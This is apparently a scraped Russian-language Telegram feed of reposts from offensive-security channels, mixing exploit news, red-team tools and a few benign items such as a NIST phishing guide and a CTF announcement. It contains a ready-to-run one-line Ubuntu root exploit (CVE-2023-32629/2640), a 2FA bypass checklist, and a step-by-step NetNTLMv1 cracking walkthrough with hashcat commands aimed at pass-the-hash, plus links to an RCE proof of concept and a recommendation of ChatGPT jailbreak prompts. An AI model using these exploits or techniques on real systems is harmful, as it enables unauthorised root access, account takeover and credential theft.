Forwarded from Proxy Bar
CVE-2023-32629 и CVE-2023-2640
Ubuntu Privilege Escalation
*
BASH одной строкой:
#ubuntu #lpe
Ubuntu Privilege Escalation
*
BASH одной строкой:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"#ubuntu #lpe
Forwarded from Волосатый бублик
#cve #openvpn
OpenVPN Access Server (cve-2023-46849, cve-2023-46850)
https://openvpn.net/security-advisory/access-server-security-update-cve-2023-46849-cve-2023-46850/
OpenVPN Access Server (cve-2023-46849, cve-2023-46850)
https://openvpn.net/security-advisory/access-server-security-update-cve-2023-46849-cve-2023-46850/
Forwarded from ФСП Санкт-Петербурга
#Лайфхак для программистов: если вы кодите с ChatGPT (а вы кодите, не обманывайте дядю), то могли заметить, что ИИ совсем обленился и не хочет сам фиксить код, возвращая вам лишь ту часть, которую нужно заменить. Чинится следующей командой, которую нужно добавить в промт:
С ней нейросеть сжалится над вами и вернет весь исправленный код, ведь вы сами не можете — у вас лапки пальцев нету...
>>> [@fspspb] <<<
– return full script (I don't have fingers)
С ней нейросеть сжалится над вами и вернет весь исправленный код, ведь вы сами не можете — у вас лапки пальцев нету...
>>> [@fspspb] <<<
🎃3❤1😁1
Forwarded from Offensive Xwitter
😈 [ Panagiotis Chartas @t3l3machus ]
For your #redteam enumeration and brute forcing needs, use babelstrike to transliterate and generate usernames from full names in various non-English languages (common issue from scraped employee data) 🌐 Currently, it covers Greek, Hindi, Spanish, French, Polish, and Hungarian:
🔗 https://github.com/t3l3machus/BabelStrike
Combine it with #psudohash, a password list generator that imitates password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers (leet), using char-case variations, adding a common padding before or after the main passphrase and more:
🔗 https://github.com/t3l3machus/psudohash
🐥 [ tweet ]
For your #redteam enumeration and brute forcing needs, use babelstrike to transliterate and generate usernames from full names in various non-English languages (common issue from scraped employee data) 🌐 Currently, it covers Greek, Hindi, Spanish, French, Polish, and Hungarian:
🔗 https://github.com/t3l3machus/BabelStrike
Combine it with #psudohash, a password list generator that imitates password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers (leet), using char-case variations, adding a common padding before or after the main passphrase and more:
🔗 https://github.com/t3l3machus/psudohash
🐥 [ tweet ]
🎃2🐳1👨💻1
Forwarded from Похек (Sergey Zybnev)
This media is not supported in your browser
VIEW IN TELEGRAM
#2FA #bypass
[+] Манипуляция ответом. Если в ответе
"success":false, измените на "success":true[+] Манипуляция кодом состояния. Если код состояния
4ХХ, попробуйте изменить его на 200 OK и посмотрите, обойдётся ли ограничение.[+] Утечка кода 2FA в ответе. Проверьте ответ на запрос, инициирующий 2FA, на предмет утечки кода.
[+] Анализ JS-файлов. Редко, но некоторые JS-файлы могут содержать информацию о коде 2FA.
[+] Повторное использование кода 2FA. Один и тот же код может быть использован повторно.
[+] Отсутствие защиты от перебора. Возможен перебор любой длины кода 2FA.
[+] Отсутствие проверки целостности кода 2FA. Код для любой учётной записи может быть использован для обхода 2FA.
[+] CSRF на отключении 2FA. Нет защиты от CSRF на отключении 2FA, также нет подтверждения аутентификации.
[+] Сброс пароля отключает 2FA. 2FA отключается при смене пароля/почты.
[+] Злоупотребление резервным кодом. Обход 2FA с помощью злоупотребления функцией резервного кода.
[+] Кликджекинг на странице отключения 2FA. Отображение страницы отключения 2FA во фрейме и социальная инженерия для отключения 2FA жертвой.
Отображение страницы отключения 2FA во фрейме и социальная инженерия для отключения 2FA жертвой, если сессия уже перехвачена и есть уязвимость таймаута сессии.
[+] Обход 2FA с помощью null или 000000. Ввод кода
000000 или null для обхода защиты 2FA.[+] Обход Google Authenticator. Установка Google Authenticator для 2FA → включение 2FA → переход на страницу сброса пароля и смена пароля → если происходит редирект в личный кабинет, значит обойден 2FA (Google Authenticator).
[+] Обход OTP при регистрации путём многократной отсылки формы с использованием Repeater. Создание аккаунта с несуществующим номером → Перехват запроса в Burp → Отсылка в Repeater и пересылка → Смена номера на существующий в Repeater → Если пришёл OTP на телефон, использовать его для регистрации несуществующего номера.
Please open Telegram to view this post
VIEW IN TELEGRAM
😈1
Forwarded from CyberSecurityTechnologies (-CST-)
pentest_azure_ad.png
1.2 MB
Forwarded from Пост Лукацкого
NIST выпустил руководство по Phish Scale, методу даже не обучению борьбе с фишингом, а тому, как оценивать сложность/способность человека самостоятельно обнаруживать фишинг без участия технических средств.
Да, руководство можно использовать и при обучении и повышении осведомленности. Там много полезных данных. Например, там приведен список индикаторов, на которые стоит обращать внимание:
1️⃣ Ошибки
2️⃣ Технические индикаторы (тип вложения, URL, подмена домена...)
3️⃣ Визуальные индикаторы (отсутствие бренда или лого, имитация логотипа, индикаторы безопасности...)
4️⃣ Язык и контент (запрос чувствительной информации, срочность, угрозы...)
5️⃣ Общие тактики (бесплатный сыр, ограниченное по времени предложение...).
Да, руководство можно использовать и при обучении и повышении осведомленности. Там много полезных данных. Например, там приведен список индикаторов, на которые стоит обращать внимание:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Нейродвиж
Абсолютно сумасшедший гений потратил дни своей жизни, чтобы собрать 7000 промтов для ChatGPT в одном месте.
Промты полезные, очень спасает сортировка по спискам. Отдельное советуем заглянуть в раздел Jailbreak — не все из них работают с GPT-4, но генерируют тонны рофлов.
Правда, мы так и не поняли, каким боком к подборке Черная пятница.
Промты полезные, очень спасает сортировка по спискам. Отдельное советуем заглянуть в раздел Jailbreak — не все из них работают с GPT-4, но генерируют тонны рофлов.
Правда, мы так и не поняли, каким боком к подборке Черная пятница.
Forwarded from RedTeam brazzers (Pavel Shlundin)
Что делать, если на пентесте вы получили NetNTLMv1 хеш учетной записи? Как пример - вы можете выполнить ntlm relay атаку или восстановить NTLM хеш по радужной таблице на сервисе crack.sh. Но что то пошло не так...Но сервис crack.sh уже больше полугода не работает. Что же делать, когда Relay атака бесполезна, а радужных таблиц нет? Ответ простой - брутить! На самом деле NetNTLMv1 хеш состоит из 2 3 блоков зашифрованных с помощью DES. А про DES мы помним, что он какой то не безопасный. Далее описаны простые шаги, как вы можете перебрать всё пространство ключей с помощью утилиты Hashcat. Данная техника не нова, она много раз описана в интернете, но вспомнить этот метод будет не лишним перед следующим постом.
1. Получаем NetNTLMv1 хеш с помощью Responder, воспользовавшись флагами --lm и --disable-ess.
2. Если не хватает терпения разбить хеш на 3 равные части - качаем скрипт и запускаем следующим образом
3. Если вам хватило терпения и вы вручную разбили хеш на 3 равные части - допишем к нему Challenge и сформируем файл для брута в следующем виде (последнюю 3-ю часть не обязательно брутить, что с ней делать я расскажу позже)
4. Далее запускаем брут следующим образом
На 8 картах 1080Ti это займет максимум 6 суток.
На 4 картах 4090Ti это займет максимум 1 день и 13 часов.
5. Получим на выходе такой файл:
6. Теперь соберем блоки обратно в NTLM хеш
7. Помните мы 3-й блок не стали брутить? Все потому что восстановить оставшуюся часть NTLM хеша не составит труда, т.к. значимые данные занимают всего 2 байта, а остальное padding (Подробности на приложенном скрине). Восстановить данную часть мы можем мгновенно полным перебором на CPU.
8. Собираем NTLM хеш из полученных частей и можем использовать его для атак Pass The Hash, Over Pass The Ticket и Silver Ticket.
1. Получаем NetNTLMv1 хеш с помощью Responder, воспользовавшись флагами --lm и --disable-ess.
2. Если не хватает терпения разбить хеш на 3 равные части - качаем скрипт и запускаем следующим образом
python http://ntlmv1.py --nossp <ntlmv1_hash_nossp>
3. Если вам хватило терпения и вы вручную разбили хеш на 3 равные части - допишем к нему Challenge и сформируем файл для брута в следующем виде (последнюю 3-ю часть не обязательно брутить, что с ней делать я расскажу позже)
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
4. Далее запускаем брут следующим образом
hashcat -m 14000 -a 3 -1 /usr/share/hashcat/charsets/DES_full.hcchr --hex-charset des.file '?1?1?1?1?1?1?1?1'
На 8 картах 1080Ti это займет максимум 6 суток.
На 4 картах 4090Ti это займет максимум 1 день и 13 часов.
5. Получим на выходе такой файл:
727b4e35f947129e:1122334455667788:$HEX[8923bdfdaf753f63]
a52b9cdedae86934:1122334455667788:$HEX[17d741d7ddc1c36f]
6. Теперь соберем блоки обратно в NTLM хеш
perl deskey_to_ntlm.pl 8923bdfdaf753f63
output= 8846f7eaee8fb1
perl deskey_to_ntlm.pl 17d741d7ddc1c36f
output= 17ad06bdd830b7
7. Помните мы 3-й блок не стали брутить? Все потому что восстановить оставшуюся часть NTLM хеша не составит труда, т.к. значимые данные занимают всего 2 байта, а остальное padding (Подробности на приложенном скрине). Восстановить данную часть мы можем мгновенно полным перебором на CPU.
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
output= 586c
8. Собираем NTLM хеш из полученных частей и можем использовать его для атак Pass The Hash, Over Pass The Ticket и Silver Ticket.
8846f7eaee8fb1 + 17ad06bdd830b7 + 586c
NT hash
8846f7eaee8fb117ad06bdd830b7586c
Forwarded from RedTeam brazzers (Pavel Shlundin)
image_2023-11-27_16-13-15.png
1.1 MB
Схема получения NetNTLMv1 хеша на основе NTLM хеша пароля.
Forwarded from Похек (Sergey Zybnev)
This media is not supported in your browser
VIEW IN TELEGRAM
#CTF
Мои хорошие друзья из КибХак МИРЭА организовали классную CTF.
Принять участие могут студенты любых ВУЗов в составе команд до пяти человек.
КибХак CTF пройдёт 9 декабря в онлайн-формате и предложит участникам решить ряд заданий в категориях Web, Reverse Engineering, Forensics, Cryptography, OSINT и др.
Телеграм-форум мероприятия для общения и поиска команды
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥1
Forwarded from Caster
Обещанный релиз новой версии 2.1 моего сниффера Above.
Caster - Above 2.1 (Codename: Vivid)
Genre: Offensive, Defensive
Subgenre: Penetration Testing, Network Security
Label: github.com
Release Date: 28 November 2023
Инструмент стал работать в несколько раз быстрее, теперь анализ протоколов на безопасность происходит одновременно;
Полностью переписан на основе Scapy, поддержка 12 сетевых протоколов канального и сетевых уровней, вместе с L7;
Добавлена функция поиска 802.1Q-тегов для обнаружения проблем безопасности сегментации;
Добавлена поддержка Windows;
Устранены баги.
Link: github.com/wearecaster/Above
Release Link: github.com/wearecaster/Above/releases/tag/vivid
Caster - Above 2.1 (Codename: Vivid)
Genre: Offensive, Defensive
Subgenre: Penetration Testing, Network Security
Label: github.com
Release Date: 28 November 2023
Инструмент стал работать в несколько раз быстрее, теперь анализ протоколов на безопасность происходит одновременно;
Полностью переписан на основе Scapy, поддержка 12 сетевых протоколов канального и сетевых уровней, вместе с L7;
Добавлена функция поиска 802.1Q-тегов для обнаружения проблем безопасности сегментации;
Добавлена поддержка Windows;
Устранены баги.
Link: github.com/wearecaster/Above
Release Link: github.com/wearecaster/Above/releases/tag/vivid
Forwarded from Cybred
https://blog.hrncirik.net/cve-2023-46214-analysis
Exploit https://github.com/nathan31337/Splunk-RCE-poc
CVE-2023-46214 is a Remote Code Execution (RCE) vulnerability found in Splunk Enterprise. The description of the vulnerability essentially states that Splunk Enterprise versions below 9.0.7 and 9.1.2 are not safely sanitizing user supplied extensible stylesheet language transformations (XSLT).
Exploit https://github.com/nathan31337/Splunk-RCE-poc
Forwarded from road to OSCP
Python-аналог PowerView.
Большинство модулей, используемых в PowerView, доступны в этом проекте
https://github.com/aniqfakhrul/powerview.py
Большинство модулей, используемых в PowerView, доступны в этом проекте
https://github.com/aniqfakhrul/powerview.py
GitHub
GitHub - aniqfakhrul/powerview.py: Just another Powerview alternative but on steroids
Just another Powerview alternative but on steroids - aniqfakhrul/powerview.py
Forwarded from Волосатый бублик
#rdp #client
[ EVILRDP ]
Rdp client with:
- Control mouse and keyboard in an automated way from command line
- Control clipboard in an automated way from command line
- Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
- Execute arbitrary SHELL and PowerShell commands on the target without uploading files
- Upload and download files to/from the target even when file transfers are disabled on the target
https://github.com/skelsec/evilrdp
[ EVILRDP ]
Rdp client with:
- Control mouse and keyboard in an automated way from command line
- Control clipboard in an automated way from command line
- Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
- Execute arbitrary SHELL and PowerShell commands on the target without uploading files
- Upload and download files to/from the target even when file transfers are disabled on the target
https://github.com/skelsec/evilrdp